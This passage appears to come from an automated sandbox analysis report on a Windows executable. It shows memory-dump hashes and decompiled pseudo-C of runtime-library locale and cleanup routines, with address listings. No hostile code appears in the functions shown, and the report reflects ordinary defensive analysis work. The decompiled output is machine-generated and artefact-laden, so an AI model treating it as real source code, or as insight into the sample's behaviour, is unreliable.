                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f8bc625960747f575df20cb5ef704cef6bb842ae0b880333161f38612edc8fe5
                                                                                                • Instruction ID: cb6c40b0838a396b992158ceee952394f66823f0d9c70096498408fd680183b7
                                                                                                • Opcode Fuzzy Hash: f8bc625960747f575df20cb5ef704cef6bb842ae0b880333161f38612edc8fe5
                                                                                                • Instruction Fuzzy Hash: 49324362D29F014DD7239639C932375A248AFB33D4F54C727F81AB6AA6EF29D4C36500
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a19cbc80267e6adb0720888b097ee89d9678a61c892a3f3b9f4e51816e52c5ad
                                                                                                • Instruction ID: 6d27c7469ff2c378ace928d33a9f50b7b50c5801bf4c388e49429e6a4c04e36a
                                                                                                • Opcode Fuzzy Hash: a19cbc80267e6adb0720888b097ee89d9678a61c892a3f3b9f4e51816e52c5ad
                                                                                                • Instruction Fuzzy Hash: 1D618A71E003085AFF78AA2A898177EB395EF82724F14041EE442DB690E765DD46B7C3
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 47d21aaf4652b4f7f7c021532478205b70d5af251fb52086d8ddcf9751cc28ea
                                                                                                • Instruction ID: ea3b3a3cc684e4f72b0279abef690633b706d447edaa9966d35e8297e398a2a3
                                                                                                • Opcode Fuzzy Hash: 47d21aaf4652b4f7f7c021532478205b70d5af251fb52086d8ddcf9751cc28ea
                                                                                                • Instruction Fuzzy Hash: 6D517271E00119AFEF14CF99C941AEEBBB2FF88314F19809DE905AB241C7359E51DB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 39916624c107ed994946a9cc77dec2f7fa82c5d3cb35a3f62b0f509a46cb451a
                                                                                                • Instruction ID: 2692b5f213ffe5a59336196bdc8fb3b27259abe62fa09c71246c0aefe8336235
                                                                                                • Opcode Fuzzy Hash: 39916624c107ed994946a9cc77dec2f7fa82c5d3cb35a3f62b0f509a46cb451a
                                                                                                • Instruction Fuzzy Hash: 6021A473F2043847770CC47E8C532B9B6E1C68C501745427AF8A6DA2C1D968D917E2E4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ee6344859e7fc27476ade317f65bd07f9488381ad758d8983624ffd184121ff1
                                                                                                • Instruction ID: 1c36d3c52f5e634f79efad9688231e285c01e174357a7a3f21d342c7f871e76f
                                                                                                • Opcode Fuzzy Hash: ee6344859e7fc27476ade317f65bd07f9488381ad758d8983624ffd184121ff1
                                                                                                • Instruction Fuzzy Hash: 2711A723F30C295B275C816D8C133BAA2D2EBD825070F537AD826E7284E994DE23D290
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction ID: 5073450985c260789718647cdf652deb1132995311dc9e4564cc15b70d1d019e
                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction Fuzzy Hash: 5E112B77A0009143FE498B2DD9B46B7A795EBC573572C437AD041CBB59D222E9C5B600
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a5f1f536e448d06af88d76c55f17056c43486bf346a8cd021904456767b1b03c
                                                                                                • Instruction ID: 446298838a24807d2542060731f93f5a3e238a51de37ef3c21476b00372b42db
                                                                                                • Opcode Fuzzy Hash: a5f1f536e448d06af88d76c55f17056c43486bf346a8cd021904456767b1b03c
                                                                                                • Instruction Fuzzy Hash: C1E0867291A22CEBC714DBDCC904D5AF3ECE746B50B1585A6F504D3100C674DE00D7D0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 74%
                                                                                                			E00F92A56(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				signed int _t65;
                                                                                                				signed char _t66;
                                                                                                				void* _t71;
                                                                                                				intOrPtr _t73;
                                                                                                				intOrPtr* _t74;
                                                                                                				void* _t82;
                                                                                                				void* _t85;
                                                                                                				void* _t88;
                                                                                                				intOrPtr* _t91;
                                                                                                				intOrPtr* _t94;
                                                                                                				intOrPtr* _t108;
                                                                                                				intOrPtr _t110;
                                                                                                				signed int _t116;
                                                                                                				void* _t117;
                                                                                                				void* _t145;
                                                                                                				void* _t146;
                                                                                                				signed int _t150;
                                                                                                				intOrPtr _t152;
                                                                                                				void* _t154;
                                                                                                				intOrPtr* _t156;
                                                                                                				void* _t157;
                                                                                                				void* _t161;
                                                                                                				intOrPtr* _t162;
                                                                                                				intOrPtr* _t163;
                                                                                                				void* _t164;
                                                                                                				intOrPtr* _t166;
                                                                                                				void* _t167;
                                                                                                				void* _t168;
                                                                                                				void* _t176;
                                                                                                				void* _t177;
                                                                                                				void* _t178;
                                                                                                				void* _t179;
                                                                                                
                                                                                                				_t179 = __eflags;
                                                                                                				_t146 = __edx;
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb7cff, __edi, __esi);
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				_t65 = E00F91875(_t146, __edi, __esi, _t179);
                                                                                                				_t116 =  *(_t167 + 0x14);
                                                                                                				_t152 =  *((intOrPtr*)(_t167 + 0x10));
                                                                                                				_t150 = 1 << _t65 >> 1;
                                                                                                				if(( *(_t167 + 0xc) & 1) != 0) {
                                                                                                					_t110 = E00F789D0();
                                                                                                					if(_t116 != 0) {
                                                                                                						_push(_t116);
                                                                                                						_t165 = _t110;
                                                                                                						E00F83DA4(_t152, _t110, __eflags, _t152, E00F912C6(_t150, _t152, _t110, __eflags), _t165);
                                                                                                						_t168 = _t168 + 0x10;
                                                                                                					} else {
                                                                                                						 *((intOrPtr*)(_t167 - 0x10)) = _t110;
                                                                                                						_t166 = E00F76B70(0x10);
                                                                                                						 *((intOrPtr*)(_t167 - 0x14)) = _t166;
                                                                                                						_pop(_t145);
                                                                                                						_t182 = _t166;
                                                                                                						if(_t166 == 0) {
                                                                                                							_t166 = 0;
                                                                                                							__eflags = 0;
                                                                                                						} else {
                                                                                                							 *(_t166 + 4) =  *(_t166 + 4) & _t116;
                                                                                                							 *_t166 = 0xfb99bc;
                                                                                                							 *((intOrPtr*)(_t166 + 8)) = E00F949C1(_t116, _t145, _t182);
                                                                                                							 *(_t166 + 0xc) = _t150;
                                                                                                						}
                                                                                                						E00F83DA4(_t152, _t166, _t182, _t152, _t166,  *((intOrPtr*)(_t167 - 0x10)));
                                                                                                						_t168 = _t168 + 0xc;
                                                                                                					}
                                                                                                				}
                                                                                                				_t66 =  *(_t167 + 0xc);
                                                                                                				if((_t66 & 0x00000020) != 0) {
                                                                                                					_t164 = E00F789D0();
                                                                                                					if(_t116 != 0) {
                                                                                                						_push(_t116);
                                                                                                						E00F83DA4(_t152, _t164, __eflags, _t152, E00F9135B(_t152, _t164, __eflags), _t164);
                                                                                                						_t168 = _t168 + 0x10;
                                                                                                					} else {
                                                                                                						_t108 = E00F76B70(8);
                                                                                                						 *((intOrPtr*)(_t167 - 0x14)) = _t108;
                                                                                                						_t185 = _t108;
                                                                                                						if(_t108 == 0) {
                                                                                                							_t108 = 0;
                                                                                                							__eflags = 0;
                                                                                                						} else {
                                                                                                							 *(_t108 + 4) =  *(_t108 + 4) & _t116;
                                                                                                							 *_t108 = 0xfb99d8;
                                                                                                						}
                                                                                                						E00F83DA4(_t152, _t164, _t185, _t152, _t108, _t164);
                                                                                                						_t168 = _t168 + 0xc;
                                                                                                					}
                                                                                                					_t66 =  *(_t167 + 0xc);
                                                                                                				}
                                                                                                				if((_t66 & 0x00000004) != 0) {
                                                                                                					_t157 = E00F789D0();
                                                                                                					if(_t116 != 0) {
                                                                                                						_push(_t116);
                                                                                                						E00F83DA4(_t152, _t157, __eflags, _t152, E00F913F0(_t152, _t157, __eflags), _t157);
                                                                                                						_t82 = E00F789D0();
                                                                                                						_push(_t116);
                                                                                                						_t158 = _t82;
                                                                                                						E00F83DA4(_t152, _t82, __eflags, _t152, E00F91485(_t152, _t82, __eflags), _t158);
                                                                                                						_t85 = E00F789D0();
                                                                                                						_push(_t116);
                                                                                                						_t159 = _t85;
                                                                                                						E00F83DA4(_t152, _t85, __eflags, _t152, E00F915AF(_t152, _t85, __eflags), _t159);
                                                                                                						_t88 = E00F789D0();
                                                                                                						_push(_t116);
                                                                                                						_t160 = _t88;
                                                                                                						E00F83DA4(_t152, _t88, __eflags, _t152, E00F9151A(_t152, _t88, __eflags), _t160);
                                                                                                						_t168 = _t168 + 0x40;
                                                                                                					} else {
                                                                                                						_t91 = E00F76B70(8);
                                                                                                						 *((intOrPtr*)(_t167 - 0x14)) = _t91;
                                                                                                						_t188 = _t91;
                                                                                                						if(_t91 == 0) {
                                                                                                							_t91 = 0;
                                                                                                							__eflags = 0;
                                                                                                						} else {
                                                                                                							 *(_t91 + 4) =  *(_t91 + 4) & _t116;
                                                                                                							 *_t91 = 0xfb99f4;
                                                                                                						}
                                                                                                						E00F83DA4(_t152, _t157, _t188, _t152, _t91, _t157);
                                                                                                						_t176 = _t168 + 0xc;
                                                                                                						_t161 = E00F789D0();
                                                                                                						_t94 = E00F76B70(8);
                                                                                                						 *((intOrPtr*)(_t167 - 0x14)) = _t94;
                                                                                                						_t189 = _t94;
                                                                                                						if(_t94 == 0) {
                                                                                                							_t94 = 0;
                                                                                                							__eflags = 0;
                                                                                                						} else {
                                                                                                							 *(_t94 + 4) =  *(_t94 + 4) & 0x00000000;
                                                                                                							 *_t94 = 0xfb9a0c;
                                                                                                						}
                                                                                                						E00F83DA4(_t152, _t161, _t189, _t152, _t94, _t161);
                                                                                                						_t177 = _t176 + 0xc;
                                                                                                						 *((intOrPtr*)(_t167 - 0x10)) = E00F789D0();
                                                                                                						_t162 = E00F76B70(0x58);
                                                                                                						 *((intOrPtr*)(_t167 - 0x14)) = _t162;
                                                                                                						 *(_t167 - 4) = 7;
                                                                                                						_t190 = _t162;
                                                                                                						if(_t162 == 0) {
                                                                                                							_t162 = 0;
                                                                                                							__eflags = 0;
                                                                                                						} else {
                                                                                                							 *((intOrPtr*)(_t162 + 4)) = 0;
                                                                                                							_push(0);
                                                                                                							_push( *((intOrPtr*)(_t167 + 8)));
                                                                                                							 *(_t167 - 4) = 8;
                                                                                                							 *_t162 = 0xfb9a24;
                                                                                                							 *((char*)(_t162 + 0x28)) = 0;
                                                                                                							E00F9292A(_t162, _t152, _t162, _t190);
                                                                                                							 *_t162 = 0xfb9a58;
                                                                                                						}
                                                                                                						 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
                                                                                                						E00F83DA4(_t152, _t162, _t190, _t152, _t162,  *((intOrPtr*)(_t167 - 0x10)));
                                                                                                						_t178 = _t177 + 0xc;
                                                                                                						 *((intOrPtr*)(_t167 - 0x10)) = E00F789D0();
                                                                                                						_t163 = E00F76B70(0x58);
                                                                                                						 *((intOrPtr*)(_t167 - 0x14)) = _t163;
                                                                                                						 *(_t167 - 4) = 0xd;
                                                                                                						_t191 = _t163;
                                                                                                						if(_t163 == 0) {
                                                                                                							_t163 = 0;
                                                                                                							__eflags = 0;
                                                                                                						} else {
                                                                                                							 *(_t163 + 4) =  *(_t163 + 4) & 0x00000000;
                                                                                                							_push(0);
                                                                                                							_push( *((intOrPtr*)(_t167 + 8)));
                                                                                                							 *(_t167 - 4) = 0xe;
                                                                                                							 *_t163 = 0xfb9a24;
                                                                                                							 *((char*)(_t163 + 0x28)) = 1;
                                                                                                							E00F9292A(_t163, _t152, _t163, _t191);
                                                                                                							 *_t163 = 0xfb9a8c;
                                                                                                						}
                                                                                                						 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
                                                                                                						E00F83DA4(_t152, _t163, _t191, _t152, _t163,  *((intOrPtr*)(_t167 - 0x10)));
                                                                                                						_t168 = _t178 + 0xc;
                                                                                                					}
                                                                                                					_t66 =  *(_t167 + 0xc);
                                                                                                				}
                                                                                                				if((_t66 & 0x00000010) != 0) {
                                                                                                					_t154 = E00F789D0();
                                                                                                					if(_t116 != 0) {
                                                                                                						_push(_t116);
                                                                                                						E00F83DA4(_t152, _t154, __eflags, _t152, E00F91644(_t152, _t154, __eflags), _t154);
                                                                                                						_t71 = E00F789D0();
                                                                                                						_push(_t116);
                                                                                                						_t155 = _t71;
                                                                                                						_t66 = E00F83DA4(_t152, _t71, __eflags, _t152, E00F916D9(_t152, _t71, __eflags), _t155);
                                                                                                					} else {
                                                                                                						_t73 = E00F76B70(0x44);
                                                                                                						 *((intOrPtr*)(_t167 - 0x14)) = _t73;
                                                                                                						 *(_t167 - 4) = 0x12;
                                                                                                						_t194 = _t73;
                                                                                                						if(_t73 == 0) {
                                                                                                							_t74 = 0;
                                                                                                							__eflags = 0;
                                                                                                						} else {
                                                                                                							_push(_t116);
                                                                                                							_push( *((intOrPtr*)(_t167 + 8)));
                                                                                                							_t74 = E00F9176E(_t73, _t154, _t194);
                                                                                                						}
                                                                                                						 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
                                                                                                						E00F83DA4(_t152, _t154, _t194, _t152, _t74, _t154);
                                                                                                						_t117 = E00F789D0();
                                                                                                						_t156 = E00F76B70(0xc);
                                                                                                						 *((intOrPtr*)(_t167 - 0x14)) = _t156;
                                                                                                						_t195 = _t156;
                                                                                                						if(_t156 == 0) {
                                                                                                							_t156 = 0;
                                                                                                							__eflags = 0;
                                                                                                						} else {
                                                                                                							 *(_t156 + 4) =  *(_t156 + 4) & 0x00000000;
                                                                                                							 *_t156 = 0xfb9aec;
                                                                                                							 *(_t156 + 8) =  *(_t156 + 8) & 0x00000000;
                                                                                                							E00F92A2D(_t117, _t152,  *((intOrPtr*)(_t167 + 8)));
                                                                                                						}
                                                                                                						_t66 = E00F83DA4(_t152, _t156, _t195, _t152, _t156, _t117);
                                                                                                					}
                                                                                                				}
                                                                                                				return E00FB388C(_t66);
                                                                                                			}



































                                                                                                0x00f92a56
                                                                                                0x00f92a56
                                                                                                0x00f92a56
                                                                                                0x00f92a5d
                                                                                                0x00f92a62
                                                                                                0x00f92a64
                                                                                                0x00f92a66
                                                                                                0x00f92a6b
                                                                                                0x00f92a70
                                                                                                0x00f92a7a
                                                                                                0x00f92a7f
                                                                                                0x00f92a86
                                                                                                0x00f92a8d
                                                                                                0x00f92aca
                                                                                                0x00f92acb
                                                                                                0x00f92ad5
                                                                                                0x00f92ada
                                                                                                0x00f92a8f
                                                                                                0x00f92a91
                                                                                                0x00f92a99
                                                                                                0x00f92a9b
                                                                                                0x00f92a9e
                                                                                                0x00f92a9f
                                                                                                0x00f92aa1
                                                                                                0x00f92ab9
                                                                                                0x00f92ab9
                                                                                                0x00f92aa3
                                                                                                0x00f92aa3
                                                                                                0x00f92aa6
                                                                                                0x00f92ab1
                                                                                                0x00f92ab4
                                                                                                0x00f92ab4
                                                                                                0x00f92ac0
                                                                                                0x00f92ac5
                                                                                                0x00f92ac5
                                                                                                0x00f92a8d
                                                                                                0x00f92add
                                                                                                0x00f92ae2
                                                                                                0x00f92aee
                                                                                                0x00f92af2
                                                                                                0x00f92b1d
                                                                                                0x00f92b26
                                                                                                0x00f92b2b
                                                                                                0x00f92af4
                                                                                                0x00f92af6
                                                                                                0x00f92afb
                                                                                                0x00f92aff
                                                                                                0x00f92b01
                                                                                                0x00f92b0e
                                                                                                0x00f92b0e
                                                                                                0x00f92b03
                                                                                                0x00f92b03
                                                                                                0x00f92b06
                                                                                                0x00f92b06
                                                                                                0x00f92b13
                                                                                                0x00f92b18
                                                                                                0x00f92b18
                                                                                                0x00f92b2e
                                                                                                0x00f92b2e
                                                                                                0x00f92b33
                                                                                                0x00f92b43
                                                                                                0x00f92b47
                                                                                                0x00f92c65
                                                                                                0x00f92c6e
                                                                                                0x00f92c7b
                                                                                                0x00f92c80
                                                                                                0x00f92c81
                                                                                                0x00f92c8b
                                                                                                0x00f92c98
                                                                                                0x00f92c9d
                                                                                                0x00f92c9e
                                                                                                0x00f92ca8
                                                                                                0x00f92cb5
                                                                                                0x00f92cba
                                                                                                0x00f92cbb
                                                                                                0x00f92cc5
                                                                                                0x00f92cca
                                                                                                0x00f92b4d
                                                                                                0x00f92b4f
                                                                                                0x00f92b54
                                                                                                0x00f92b58
                                                                                                0x00f92b5a
                                                                                                0x00f92b67
                                                                                                0x00f92b67
                                                                                                0x00f92b5c
                                                                                                0x00f92b5c
                                                                                                0x00f92b5f
                                                                                                0x00f92b5f
                                                                                                0x00f92b6c
                                                                                                0x00f92b71
                                                                                                0x00f92b80
                                                                                                0x00f92b82
                                                                                                0x00f92b87
                                                                                                0x00f92b8b
                                                                                                0x00f92b8d
                                                                                                0x00f92b9b
                                                                                                0x00f92b9b
                                                                                                0x00f92b8f
                                                                                                0x00f92b8f
                                                                                                0x00f92b93
                                                                                                0x00f92b93
                                                                                                0x00f92ba0
                                                                                                0x00f92ba5
                                                                                                0x00f92bb4
                                                                                                0x00f92bbc
                                                                                                0x00f92bbf
                                                                                                0x00f92bc2
                                                                                                0x00f92bc9
                                                                                                0x00f92bcb
                                                                                                0x00f92bf2
                                                                                                0x00f92bf2
                                                                                                0x00f92bcd
                                                                                                0x00f92bcf
                                                                                                0x00f92bd2
                                                                                                0x00f92bd3
                                                                                                0x00f92bd8
                                                                                                0x00f92bdc
                                                                                                0x00f92be2
                                                                                                0x00f92be5
                                                                                                0x00f92bea
                                                                                                0x00f92bea
                                                                                                0x00f92bf7
                                                                                                0x00f92bfd
                                                                                                0x00f92c02
                                                                                                0x00f92c11
                                                                                                0x00f92c19
                                                                                                0x00f92c1c
                                                                                                0x00f92c1f
                                                                                                0x00f92c26
                                                                                                0x00f92c28
                                                                                                0x00f92c50
                                                                                                0x00f92c50
                                                                                                0x00f92c2a
                                                                                                0x00f92c2a
                                                                                                0x00f92c2e
                                                                                                0x00f92c30
                                                                                                0x00f92c35
                                                                                                0x00f92c39
                                                                                                0x00f92c3f
                                                                                                0x00f92c43
                                                                                                0x00f92c48
                                                                                                0x00f92c48
                                                                                                0x00f92c55
                                                                                                0x00f92c5b
                                                                                                0x00f92c60
                                                                                                0x00f92c60
                                                                                                0x00f92ccd
                                                                                                0x00f92ccd
                                                                                                0x00f92cd2
                                                                                                0x00f92ce2
                                                                                                0x00f92ce6
                                                                                                0x00f92d62
                                                                                                0x00f92d6b
                                                                                                0x00f92d78
                                                                                                0x00f92d7d
                                                                                                0x00f92d7e
                                                                                                0x00f92d88
                                                                                                0x00f92ce8
                                                                                                0x00f92cea
                                                                                                0x00f92cf0
                                                                                                0x00f92cf3
                                                                                                0x00f92cfa
                                                                                                0x00f92cfc
                                                                                                0x00f92d0b
                                                                                                0x00f92d0b
                                                                                                0x00f92cfe
                                                                                                0x00f92cfe
                                                                                                0x00f92cff
                                                                                                0x00f92d04
                                                                                                0x00f92d04
                                                                                                0x00f92d0d
                                                                                                0x00f92d14
                                                                                                0x00f92d28
                                                                                                0x00f92d2f
                                                                                                0x00f92d31
                                                                                                0x00f92d35
                                                                                                0x00f92d37
                                                                                                0x00f92d53
                                                                                                0x00f92d53
                                                                                                0x00f92d39
                                                                                                0x00f92d39
                                                                                                0x00f92d42
                                                                                                0x00f92d48
                                                                                                0x00f92d4c
                                                                                                0x00f92d4c
                                                                                                0x00f92d58
                                                                                                0x00f92d5d
                                                                                                0x00f92ce6
                                                                                                0x00f92d95

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F92A5D
                                                                                                • collate.LIBCPMT ref: 00F92A66
                                                                                                  • Part of subcall function 00F91875: __EH_prolog3_GS.LIBCMT ref: 00F9187C
                                                                                                  • Part of subcall function 00F91875: __Getcoll.LIBCPMT ref: 00F918E0
                                                                                                • __Getcoll.LIBCPMT ref: 00F92AAC
                                                                                                • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F92AC0
                                                                                                • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F92AD5
                                                                                                • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F92B13
                                                                                                • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F92B26
                                                                                                • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F92B6C
                                                                                                • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F92BA0
                                                                                                • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F92C5B
                                                                                                • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F92C6E
                                                                                                • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F92C8B
                                                                                                • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F92CA8
                                                                                                • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F92CC5
                                                                                                • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F92BFD
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • numpunct.LIBCPMT ref: 00F92D04
                                                                                                • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F92D14
                                                                                                • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F92D58
                                                                                                  • Part of subcall function 00F76B70: LocalAlloc.KERNEL32(00000040,?,00F85614,00000020,?,?,00F79862,00000000,FD8FA683,?,?,?,?,00FB6588,000000FF), ref: 00F76B76
                                                                                                • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F92D6B
                                                                                                • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F92D88
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                                                • String ID:
                                                                                                • API String ID: 3717464618-0
                                                                                                • Opcode ID: 5d5e949f780e031e10b0d76d2e21c85fec3200cb6b003d01a1112d7907114d33
                                                                                                • Instruction ID: da91eaafe27a69b1fcb0c6b65fb7140852acf71e68442a2c0f74a42234fb63aa
                                                                                                • Opcode Fuzzy Hash: 5d5e949f780e031e10b0d76d2e21c85fec3200cb6b003d01a1112d7907114d33
                                                                                                • Instruction Fuzzy Hash: 3F910972D052056AFB617F658C06B7F7AB8DF81760F14802BF949A7352DE784900B7A2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00FABB6F(intOrPtr _a4) {
                                                                                                				intOrPtr _v8;
                                                                                                				intOrPtr _t25;
                                                                                                				intOrPtr* _t26;
                                                                                                				intOrPtr _t28;
                                                                                                				intOrPtr* _t29;
                                                                                                				intOrPtr* _t31;
                                                                                                				intOrPtr* _t45;
                                                                                                				intOrPtr* _t46;
                                                                                                				intOrPtr* _t47;
                                                                                                				intOrPtr* _t55;
                                                                                                				intOrPtr* _t70;
                                                                                                				intOrPtr _t74;
                                                                                                
                                                                                                				_t74 = _a4;
                                                                                                				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                                                                				if(_t25 != 0 && _t25 != 0xfcf060) {
                                                                                                					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                                                                					if(_t45 != 0 &&  *_t45 == 0) {
                                                                                                						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                                                                						if(_t46 != 0 &&  *_t46 == 0) {
                                                                                                							E00FA609F(_t46);
                                                                                                							E00FAADFE( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                						}
                                                                                                						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                                                                						if(_t47 != 0 &&  *_t47 == 0) {
                                                                                                							E00FA609F(_t47);
                                                                                                							E00FAB2B5( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                						}
                                                                                                						E00FA609F( *((intOrPtr*)(_t74 + 0x7c)));
                                                                                                						E00FA609F( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                					}
                                                                                                				}
                                                                                                				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                                                                				if(_t26 != 0 &&  *_t26 == 0) {
                                                                                                					E00FA609F( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                                                                					E00FA609F( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                                                                					E00FA609F( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                                                                					E00FA609F( *((intOrPtr*)(_t74 + 0x8c)));
                                                                                                				}
                                                                                                				E00FABCE2( *((intOrPtr*)(_t74 + 0x9c)));
                                                                                                				_t28 = 6;
                                                                                                				_t55 = _t74 + 0xa0;
